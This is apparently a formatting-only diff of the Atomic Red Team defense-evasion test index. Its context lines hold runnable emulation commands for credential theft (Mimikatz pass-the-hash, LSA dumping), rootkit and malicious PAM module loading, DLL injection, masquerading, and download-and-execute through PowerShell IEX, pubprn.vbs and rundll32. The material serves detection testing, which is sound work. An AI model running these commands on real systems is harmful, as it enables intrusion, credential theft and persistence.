@@ -32537,7 +32537,7 @@ defense-evasion: "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary. - ' +' supported_platforms: - windows executor: @@ -32548,7 +32548,7 @@ defense-evasion: 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .(''%'') { ( [CHAR] ( $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) ) - ' +' name: powershell - name: Obfuscated Command Line using special Unicode characters auto_generated_guid: e68b945c-52d0-4dd9-a5e8-d173d70c448f @@ -32646,7 +32646,7 @@ defense-evasion: auto_generated_guid: 2430498b-06c0-4b92-a448-8ad263c388e2 description: 'Execute arbitrary DLL file stored locally. - ' +' supported_platforms: - windows input_arguments: @@ -32658,17 +32658,17 @@ defense-evasion: dependencies: - description: 'T1218-2.dll must exist on disk at specified location (#{dll_payload}) - ' +' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}" executor: command: 'odbcconf.exe /S /A {REGSVR "#{dll_payload}"} - ' +' name: command_prompt T1134.004: technique: @@ -32781,10 +32781,10 @@ defense-evasion: dependencies: - description: 'DLL to inject must exist on disk at specified location (#{dll_path}) - ' +' prereq_command: 'if (Test-Path #{dll_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}" 
@@ -32825,7 +32825,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine ''#{command_line}'' -ParentId #{parent_pid}' @@ -32854,7 +32854,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid #{test_guid}' @@ -32884,7 +32884,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine, ProcessId -Filter "Name = ''svchost.exe'' AND CommandLine LIKE ''%''" | @@ -32920,7 +32920,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine ''#{command_line}''' @@ -33005,7 +33005,7 @@ defense-evasion: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) - ' +' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -33020,13 +33020,13 @@ defense-evasion: command: '#{mimikatz_path} "sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}" - ' +' name: command_prompt - name: crackmapexec Pass the Hash auto_generated_guid: eb05b028-16c8-4ad8-adea-6f5b219da9a9 description: 'command execute with crackmapexec - ' +' supported_platforms: - windows input_arguments: 
@@ -33055,14 +33055,14 @@ defense-evasion: - description: 'CrackMapExec executor must exist on disk at specified location (#{crackmapexec_exe}) - ' +' prereq_command: 'if(Test-Path #{crackmapexec_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Automated installer not implemented yet, please install crackmapexec manually at this location: #{crackmapexec_exe} - ' +' executor: command: "#{crackmapexec_exe} #{domain} -u #{user_name} -H #{ntlm} -x #{command}\n" name: command_prompt @@ -33143,7 +33143,7 @@ defense-evasion: auto_generated_guid: dbf38128-7ba7-4776-bedf-cc2eed432098 description: 'Similar to PTH, but attacking Kerberos - ' +' supported_platforms: - windows input_arguments: @@ -33151,7 +33151,7 @@ defense-evasion: description: Ticket file name usually format of 'id-username\@domain.kirbi' (e.g. can be dumped by "sekurlsa::tickets /export" module) type: String - default: + default: mimikatz_exe: description: Path of the Mimikatz binary type: Path @@ -33160,10 +33160,10 @@ defense-evasion: dependencies: - description: 'Mimikatz must exist on disk at specified location (#{mimikatz_exe}) - ' +' prereq_command: 'if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href @@ -33174,7 +33174,7 @@ defense-evasion: executor: command: '#{mimikatz_exe} "kerberos::ptt #{ticket}" - ' +' name: command_prompt - name: Rubeus Kerberos Pass The Ticket auto_generated_guid: a2fc4ec5-12c6-4fb4-b661-961f23f359cb 
@@ -33217,19 +33217,19 @@ defense-evasion: dependencies: - description: 'Rubeus must exist on disk at specified location (#{rubeus_path}) - ' +' prereq_command: 'if (Test-Path #{rubeus_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{rubeus_path} - ' +' - description: 'PsExec must exist on disk at specified location (#{psexec_path}) - ' +' prereq_command: 'if (Test-Path #{psexec_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force @@ -33312,7 +33312,7 @@ defense-evasion: description: 'Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges. - ' +' supported_platforms: - windows input_arguments: @@ -33325,14 +33325,14 @@ defense-evasion: - description: 'AtomicPasswordFilter.dll must exist on disk at specified location (#{input_dll}) - ' +' prereq_command: 'if (Test-Path #{input_dll}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host "You must provide your own password filter dll" - ' +' executor: command: | $passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename @@ -33754,10 +33754,10 @@ defense-evasion: elevation_required: true command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} - ' +' cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} - ' +' - name: Malicious PAM module auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326 description: | 
@@ -33791,35 +33791,35 @@ defense-evasion: - description: 'The PAM development library must be installed to build the PAM module - ' +' prereq_command: 'if [ -f /usr/include/security/pam_modules.h ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'if [ -n "`which apt-get`" ]; then sudo apt-get -y install libpam0g-dev; elif [ -n "`which yum`" ]; then sudo yum -y install pam-devel; fi - ' +' - description: 'The PAM module must exist on disk at specified location (#{path_to_pam_module}) - ' +' prereq_command: 'if [ -f #{path_to_pam_module} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'sudo gcc -shared -fPIC -o #{path_to_pam_module} #{path_to_pam_module_source} - ' +' executor: name: sh elevation_required: true command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} - ' +' cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} - ' +' T1205.001: technique: external_references: @@ -34256,13 +34256,13 @@ defense-evasion: cleanup_command: 'Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore - ' +' name: powershell - name: RunPE via VBA auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b description: 'This module executes notepad.exe from within the WINWORD.EXE process - ' +' supported_platforms: - windows input_arguments: @@ -34274,7 +34274,7 @@ defense-evasion: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -34285,7 +34285,7 @@ defense-evasion: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" 
@@ -34408,7 +34408,7 @@ defense-evasion: dependencies: - description: 'The 64-bit version of Microsoft Office must be installed - ' +' prereq_command: | try { $wdApp = New-Object -COMObject "Word.Application" @@ -34419,7 +34419,7 @@ defense-evasion: get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -34454,7 +34454,7 @@ defense-evasion: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) - ' +' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -34469,10 +34469,10 @@ defense-evasion: - description: 'PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path}) - ' +' prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" @@ -34483,7 +34483,7 @@ defense-evasion: command: '#{psexec_path} /accepteula \\#{machine} -c #{mimikatz_path} "lsadump::lsa /inject /id:500" "exit" - ' +' name: command_prompt elevation_required: false T1055.008: @@ -34618,7 +34618,7 @@ defense-evasion: description: 'Executes the signed PubPrn.vbs script with options to download and execute an arbitrary payload. - ' +' supported_platforms: - windows input_arguments: @@ -34630,7 +34630,7 @@ defense-evasion: command: 'cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:#{remote_payload}" - ' +' name: command_prompt T1542.004: technique: 
@@ -34853,7 +34853,7 @@ defense-evasion: description: 'Executes the Uninstall Method, No Admin Rights Required. Upon execution, "I shouldn''t really execute either." will be displayed. - ' +' supported_platforms: - windows input_arguments: @@ -34870,10 +34870,10 @@ defense-evasion: - description: 'The CSharp source file must exist on disk at specified location (#{source_file}) - ' +' prereq_command: 'if (Test-Path #{source_file}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.009/src/T1218.009.cs" -OutFile "#{source_file}" @@ -34883,7 +34883,7 @@ defense-evasion: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{output_file} cleanup_command: 'del #{output_file} >nul 2>&1 - ' +' name: command_prompt - name: Regsvcs Uninstall Method Call Test auto_generated_guid: fd3c1c6a-02d2-4b72-82d9-71c527abb126 @@ -34906,10 +34906,10 @@ defense-evasion: - description: 'The CSharp source file must exist on disk at specified location (#{source_file}) - ' +' prereq_command: 'if (Test-Path #{source_file}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.009/src/T1218.009.cs" -OutFile "#{source_file}" @@ -34998,7 +34998,7 @@ defense-evasion: description: 'Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched. - ' +' supported_platforms: - windows input_arguments: 
@@ -35018,10 +35018,10 @@ defense-evasion: dependencies: - description: 'Regsvr32.sct must exist on disk at specified location (#(unknown)) - ' +' prereq_command: 'if (Test-Path #(unknown)) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #(unknown)) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/src/RegSvr32.sct" -OutFile "#(unknown)" @@ -35056,7 +35056,7 @@ defense-evasion: description: 'Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched. - ' +' supported_platforms: - windows input_arguments: @@ -35077,10 +35077,10 @@ defense-evasion: - description: 'AllTheThingsx86.dll must exist on disk at specified location (#{dll_name}) - ' +' prereq_command: 'if (Test-Path #{dll_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{dll_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/bin/AllTheThingsx86.dll" -OutFile "#{dll_name}" @@ -35088,14 +35088,14 @@ defense-evasion: command: 'IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s #{dll_name}) ELSE ( #{regsvr32path}\#{regsvr32name} /s #{dll_name} ) - ' +' name: command_prompt - name: Regsvr32 Registering Non DLL auto_generated_guid: 1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421 description: 'Replicating observed Gozi maldoc behavior registering a dll with an altered extension - ' +' supported_platforms: - windows input_arguments: @@ -35115,13 +35115,13 @@ defense-evasion: dependencies: - description: 'Test requires a renamed dll file - ' +' prereq_command: 'if exist #{dll_file} ( exit 0 ) else ( exit 1 ) - ' +' get_prereq_command: 'copy "C:\Windows\System32\shell32.dll" "#{dll_file}" - ' +' executor: name: command_prompt elevation_required: false 
@@ -35237,7 +35237,7 @@ defense-evasion: %SystemRoot%\Temp\lsass.exe /B cleanup_command: 'del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1 - ' +' name: command_prompt - name: Masquerading as Linux crond process. auto_generated_guid: a315bfff-7a98-403b-b442-2ea1b255e556 @@ -35253,7 +35253,7 @@ defense-evasion: echo 'sleep 5' | /tmp/crond cleanup_command: 'rm /tmp/crond - ' +' name: sh - name: Masquerading - cscript.exe running as notepad.exe auto_generated_guid: 3a2a578b-0a01-46e4-92e3-62e2859b42f0 @@ -35269,7 +35269,7 @@ defense-evasion: cmd.exe /c %APPDATA%\notepad.exe /B cleanup_command: 'del /Q /F %APPDATA%\notepad.exe >nul 2>&1 - ' +' name: command_prompt - name: Masquerading - wscript.exe running as svchost.exe auto_generated_guid: 24136435-c91a-4ede-9da1-8b284a1c1a23 @@ -35285,7 +35285,7 @@ defense-evasion: cmd.exe /c %APPDATA%\svchost.exe /B cleanup_command: 'del /Q /F %APPDATA%\svchost.exe >nul 2>&1 - ' +' name: command_prompt - name: Masquerading - powershell.exe running as taskhostw.exe auto_generated_guid: ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa @@ -35301,7 +35301,7 @@ defense-evasion: cmd.exe /K %APPDATA%\taskhostw.exe cleanup_command: 'del /Q /F %APPDATA%\taskhostw.exe >nul 2>&1 - ' +' name: command_prompt - name: Masquerading - non-windows exe running as windows exe auto_generated_guid: bc15c13f-d121-4b1f-8c7d-28d95854d086 @@ -35324,10 +35324,10 @@ defense-evasion: dependencies: - description: 'Exe file to copy must exist on disk at specified location (#{inputfile}) - ' +' prereq_command: 'if (Test-Path #{inputfile}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{inputfile}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/bin/T1036.003.exe" -OutFile "#{inputfile}" 
@@ -35338,14 +35338,14 @@ defense-evasion: Stop-Process -ID $myT1036_003 cleanup_command: 'Remove-Item #{outputfile} -Force -ErrorAction Ignore - ' +' name: powershell - name: Masquerading - windows exe running as different windows exe auto_generated_guid: c3d24a39-2bfe-4c6a-b064-90cd73896cb0 description: 'Copies a windows exe, renames it as another windows exe, and launches it to masquerade as second windows exe - ' +' supported_platforms: - windows input_arguments: @@ -35364,7 +35364,7 @@ defense-evasion: Stop-Process -ID $myT1036_003 cleanup_command: 'Remove-Item #{outputfile} -Force -ErrorAction Ignore - ' +' name: powershell - name: Malicious process Masquerading as LSM.exe auto_generated_guid: 83810c46-f45e-4485-9ab6-8ed0e9e6ed7f @@ -35646,7 +35646,7 @@ defense-evasion: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) - ' +' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -35660,10 +35660,10 @@ defense-evasion: - description: 'PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path}) - ' +' prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} - ' +' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force @@ -35696,7 +35696,7 @@ defense-evasion: Write-Host "End of DCShadow" cleanup_command: 'Stop-Process -Name "mimikatz" -Force -ErrorAction Ignore - ' +' T1014: technique: id: attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b @@ -35774,7 +35774,7 @@ defense-evasion: auto_generated_guid: dfb50072-e45a-4c75-a17e-a484809c8553 description: 'Loadable Kernel Module based Rootkit - ' +' supported_platforms: - linux input_arguments: 
@@ -35799,10 +35799,10 @@ defense-evasion: dependencies: - description: 'The kernel module must exist on disk at specified location (#{rootkit_path}) - ' +' prereq_command: 'if [ -f #{rootkit_path} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: | if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi; cp #{rootkit_source_path}/* #{temp_folder}/ @@ -35812,17 +35812,17 @@ defense-evasion: executor: command: 'sudo insmod #{rootkit_path} - ' +' cleanup_command: 'sudo rmmod #{rootkit_name} - ' +' name: sh elevation_required: true - name: Loadable Kernel Module based Rootkit auto_generated_guid: 75483ef8-f10f-444a-bf02-62eb0e48db6f description: 'Loadable Kernel Module based Rootkit - ' +' supported_platforms: - linux input_arguments: @@ -35847,11 +35847,11 @@ defense-evasion: dependencies: - description: 'The kernel module must exist on disk at specified location (#{rootkit_path}) - ' +' prereq_command: 'if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: "if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi;\ncp #{rootkit_source_path}/* #{temp_folder}/\ncd #{temp_folder}; make \nsudo cp #{temp_folder}/#{rootkit_name}.ko @@ -35860,7 +35860,7 @@ defense-evasion: executor: command: 'sudo modprobe #{rootkit_name} - ' +' cleanup_command: | sudo modprobe -r #{rootkit_name} sudo rm /lib/modules/$(uname -r)/#{rootkit_name}.ko @@ -35990,7 +35990,7 @@ defense-evasion: description: 'Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened. - ' +' supported_platforms: - windows input_arguments: @@ -36001,7 +36001,7 @@ defense-evasion: executor: command: 'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec(); - ' +' name: command_prompt - name: Rundll32 execute VBscript command auto_generated_guid: 638730e7-7aed-43dc-bf8c-8117f805f5bb 
@@ -36019,7 +36019,7 @@ defense-evasion: executor: command: 'rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("#{command_to_execute}"),0) - ' +' name: command_prompt - name: Rundll32 advpack.dll Execution auto_generated_guid: d91cae26-7fc1-457b-a854-34c8aad48c89 @@ -36038,17 +36038,17 @@ defense-evasion: dependencies: - description: 'Inf file must exist on disk at specified location (#{inf_to_execute}) - ' +' prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011.inf" -OutFile "#{inf_to_execute}" executor: command: 'rundll32.exe advpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1, - ' +' name: command_prompt - name: Rundll32 ieadvpack.dll Execution auto_generated_guid: 5e46a58e-cbf6-45ef-a289-ed7754603df9 @@ -36068,17 +36068,17 @@ defense-evasion: dependencies: - description: 'Inf file must exist on disk at specified location (#{inf_to_execute}) - ' +' prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011.inf" -OutFile "#{inf_to_execute}" executor: command: 'rundll32.exe ieadvpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1, - ' +' name: command_prompt - name: Rundll32 syssetup.dll Execution auto_generated_guid: 41fa324a-3946-401e-bbdd-d7991c628125 
@@ -36097,10 +36097,10 @@ defense-evasion: dependencies: - description: 'Inf file must exist on disk at specified location (#{inf_to_execute}) - ' +' prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011_DefaultInstall.inf" -OutFile "#{inf_to_execute}" @@ -36108,7 +36108,7 @@ defense-evasion: command: 'rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 .\#{inf_to_execute} - ' +' name: command_prompt - name: Rundll32 setupapi.dll Execution auto_generated_guid: 71d771cd-d6b3-4f34-bc76-a63d47a10b19 @@ -36127,10 +36127,10 @@ defense-evasion: dependencies: - description: 'Inf file must exist on disk at specified location (#{inf_to_execute}) - ' +' prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011_DefaultInstall.inf" -OutFile "#{inf_to_execute}" @@ -36138,7 +36138,7 @@ defense-evasion: command: 'rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 .\#{inf_to_execute} - ' +' name: command_prompt - name: Execution of HTA and VBS Files using Rundll32 and URL.dll auto_generated_guid: 22cfde89-befe-4e15-9753-47306b37a6e3 @@ -36161,7 +36161,7 @@ defense-evasion: description: 'Executes the LaunchApplication function in pcwutl.dll to proxy execution of an executable. - ' +' supported_platforms: - windows input_arguments: @@ -36172,7 +36172,7 @@ defense-evasion: executor: command: 'rundll32.exe pcwutl.dll,LaunchApplication #{exe_to_launch} - ' +' name: command_prompt T1134.005: technique: 
@@ -36571,7 +36571,7 @@ defense-evasion: description: 'Change Service registry ImagePath of a bengin service to a malicious file - ' +' supported_platforms: - windows input_arguments: @@ -36591,22 +36591,22 @@ defense-evasion: dependencies: - description: 'The service must exist (#{weak_service_name}) - ' +' prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}" - ' +' executor: command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "#{malicious_service_path}" - ' +' cleanup_command: 'sc.exe delete #{weak_service_name} - ' +' name: command_prompt T1548.001: technique: @@ -36662,7 +36662,7 @@ defense-evasion: description: 'Make, change owner, and change file attributes on a C source code file - ' +' supported_platforms: - macos - linux @@ -36688,7 +36688,7 @@ defense-evasion: auto_generated_guid: 759055b3-3885-4582-a8ec-c00c9d64dd79 description: 'This test sets the SetUID flag on a file in Linux and macOS. - ' +' supported_platforms: - macos - linux @@ -36704,14 +36704,14 @@ defense-evasion: sudo chmod u+s #{file_to_setuid} cleanup_command: 'sudo rm #{file_to_setuid} - ' +' name: sh elevation_required: true - name: Set a SetGID flag on file auto_generated_guid: db55f666-7cba-46c6-9fe6-205a05c3242c description: 'This test sets the SetGID flag on a file in Linux and macOS. - ' +' supported_platforms: - macos - linux @@ -36727,7 +36727,7 @@ defense-evasion: sudo chmod g+s #{file_to_setuid} cleanup_command: 'sudo rm #{file_to_setuid} - ' +' name: sh elevation_required: true - name: Make and modify capabilities of a binary @@ -36759,7 +36759,7 @@ defense-evasion: description: 'This test gives a file the capability to set UID without using flags. - ' +' supported_platforms: - linux input_arguments: 
@@ -36773,7 +36773,7 @@ defense-evasion: sudo setcap cap_setuid=ep #{file_to_setcap} cleanup_command: 'rm #{file_to_setcap} - ' +' name: sh elevation_required: true T1218: @@ -36832,7 +36832,7 @@ defense-evasion: description: 'Injects arbitrary DLL into running process specified by process ID. Requires Windows 10. - ' +' supported_platforms: - windows input_arguments: @@ -36848,17 +36848,17 @@ defense-evasion: dependencies: - description: 'T1218.dll must exist on disk at specified location (#{dll_payload}) - ' +' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/x64/T1218.dll" -OutFile "#{dll_payload}" executor: command: 'mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload} - ' +' name: command_prompt elevation_required: true - name: SyncAppvPublishingServer - Execute arbitrary PowerShell code @@ -36866,7 +36866,7 @@ defense-evasion: description: 'Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. Requires Windows 10. - ' +' supported_platforms: - windows input_arguments: @@ -36877,14 +36877,14 @@ defense-evasion: executor: command: 'SyncAppvPublishingServer.exe "n; #{powershell_code}" - ' +' name: command_prompt - name: Register-CimProvider - Execute evil dll auto_generated_guid: ad2c17ed-f626-4061-b21e-b9804a6f3655 description: 'Execute arbitrary dll. Requires at least Windows 8/2012. Also note this dll can be served up via SMB - ' +' supported_platforms: - windows input_arguments: 
@@ -36896,17 +36896,17 @@ defense-evasion: dependencies: - description: 'T1218-2.dll must exist on disk at specified location (#{dll_payload}) - ' +' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}" executor: command: 'C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload} - ' +' name: command_prompt - name: InfDefaultInstall.exe .inf Execution auto_generated_guid: 54ad7d5a-a1b5-472c-b6c4-f8090fb2daef @@ -36925,17 +36925,17 @@ defense-evasion: dependencies: - description: 'INF file must exist on disk at specified location (#{inf_to_execute}) - ' +' prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Infdefaultinstall.inf" -OutFile "#{inf_to_execute}" executor: command: 'InfDefaultInstall.exe #{inf_to_execute} - ' +' name: command_prompt - name: ProtocolHandler.exe Downloaded a Suspicious File auto_generated_guid: db020456-125b-4c8b-a4a7-487df8afb5a2 @@ -36943,7 +36943,7 @@ defense-evasion: Office. On successful execution you should see Microsoft Word launch a blank file. - ' +' supported_platforms: - windows input_arguments: 
@@ -36956,15 +36956,15 @@ defense-evasion: - description: 'Microsoft Word must be installed with the correct path and protocolhandler.exe must be provided - ' +' prereq_command: 'if (Test-Path "(Resolve-Path "C:\Program Files*\Microsoft Office\root\Office16")\protocolhandler.exe") {exit 0} else {exit 1} - ' +' get_prereq_command: 'write-host "Install Microsoft Word or provide correct path." - ' +' executor: name: command_prompt elevation_required: false @@ -36976,7 +36976,7 @@ defense-evasion: description: 'Emulates attack with Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe - ' +' supported_platforms: - windows input_arguments: @@ -36998,15 +36998,15 @@ defense-evasion: prereq_command: 'if (Test-Path #{mwcpath}\#{mwcname} ) {exit 0} else {exit 1} - ' +' get_prereq_command: 'write-host ".Net must be installed for this test to work correctly." - ' +' executor: command: '#{mwcpath}\#{mwcname} "#{xml_payload}" output.txt - ' +' name: powershell elevation_required: false - name: Renamed Microsoft.Workflow.Compiler.exe Payload Executions @@ -37014,7 +37014,7 @@ defense-evasion: description: 'Emulates attack with a renamed Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe - ' +' supported_platforms: - windows input_arguments: @@ -37043,7 +37043,7 @@ defense-evasion: get_prereq_command: 'write-host "you need to rename workflow complier before you run this test" - ' +' executor: command: "#{renamed_binary} #{xml_payload} output.txt\n" name: powershell @@ -37086,7 +37086,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName #{module_name} -ModulePath #{module_path}' 
